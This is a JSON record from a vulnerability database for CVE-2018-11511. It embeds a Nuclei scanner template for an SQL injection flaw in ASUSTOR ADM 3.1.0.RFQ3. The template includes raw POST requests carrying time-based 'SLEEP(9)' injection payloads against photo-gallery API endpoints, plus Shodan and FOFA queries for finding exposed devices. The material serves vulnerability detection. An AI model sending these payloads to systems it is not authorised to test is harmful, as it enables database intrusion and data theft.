{"_links":{"capec":{"href":"/api/v1/vulnerability/cve-2018-11511/capec"},"cvss":{"href":"/api/v1/vulnerability/cve-2018-11511/cvss"},"cwe":{"href":"/api/v1/vulnerability/cve-2018-11511/cwe"},"enrichment":{"href":"/api/v1/vulnerability/cve-2018-11511/enrichment"},"gcve":{"href":"/api/v1/vulnerability/cve-2018-11511/gcve"},"self":{"href":"/api/v1/vulnerability/cve-2018-11511"},"sightings":{"href":"/api/v1/sightings/cve-2018-11511"}},"data":{"nuclei":true,"nuclei_template":"http/cves/2018/CVE-2018-11511.yaml","nuclei_template_severity":"critical","nuclei_template_yaml":"id: CVE-2018-11511\n\ninfo:\n  name: ASUSTOR ADM 3.1.0.RFQ3 - SQL Injection\n  author: ritikchaddha\n  severity: critical\n  description: |\n    ASUSTOR ADM version 3.1.0.RFQ3 is vulnerable to SQL injection via the album_id parameter in the /photo-gallery/api/album/tree_lists/ endpoint. An attacker can exploit this vulnerability to execute arbitrary SQL commands on the database, potentially leading to information disclosure or further compromise of the affected system.\n  impact: |\n    Unauthenticated attackers can execute arbitrary SQL commands to access, modify, or delete database contents, potentially compromising the entire ASUSTOR ADM system and accessing stored data.\n  remediation: |\n    Upgrade to a patched version of ASUSTOR ADM or apply vendor-provided security updates.\n  reference:\n    - https://www.exploit-db.com/exploits/44909\n    - https://nvd.nist.gov/vuln/detail/CVE-2018-11511\n  classification:\n    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n    cvss-score: 9.8\n    cve-id: CVE-2018-11511\n    epss-score: 0.11266\n    epss-percentile: 0.95778\n    cwe-id: CWE-89\n    cpe: cpe:2.3:a:asustor:asustor_data_master:3.1.0:*:*:*:*:*:*:*\n  metadata:\n    verified: true\n    max-request: 1\n    vendor: asustor\n    product: asustor-data-master\n    shodan-query: http.html:\"ASUSTOR\"\n    fofa-query: body=\"ASUSTOR\" && icon_hash=\"1678170702\"\n  tags: cve,cve2018,asustor,adm,sqli,vkev,vuln\n\nhttp:\n  - raw:\n      - |\n        @timeout: 30s\n        POST /photo-gallery/api/album/tree_lists/ HTTP/1.1\n        Host: {{Hostname}}\n        Content-Type: application/x-www-form-urlencoded\n\n        album_id=106298411+AND+SLEEP(9)&start=0&limit=100&order=name_asc&api=v2\n\n      - |\n        @timeout: 30s\n        POST /photo-gallery/api/photo/search/ HTTP/1.1\n        Host: {{Hostname}}\n        Content-Type: application/x-www-form-urlencoded\n\n        keyword=jpg&scope=106298414+AND+SLEEP(9)&start=0&limit=100&order=name_asc&api_mode=browse&api=v2\n\n    stop-at-first-match: true\n    matchers:\n      - type: dsl\n        dsl:\n          - 'duration>=9'\n          - 'status_code == 200'\n          - 'contains(body, \"success\\\":\")'\n          - 'contains_any(body, \"album_not_exist\\\"\", \"album_items\\\":\")'\n        condition: and\n# digest: 4b0a00483046022100913381b8bfccb0c03b8e438a5b76432de231fdcc24c045f87a73b59cf723ecbd022100c5b7bc9a5ef110c927777fa2e395b43b80d51a4c42f665ee8a19e1e89ccf1f41:922c64590222798bb761d5b6d8e72950"},"source":"nuclei","vuln_id":"cve-2018-11511"}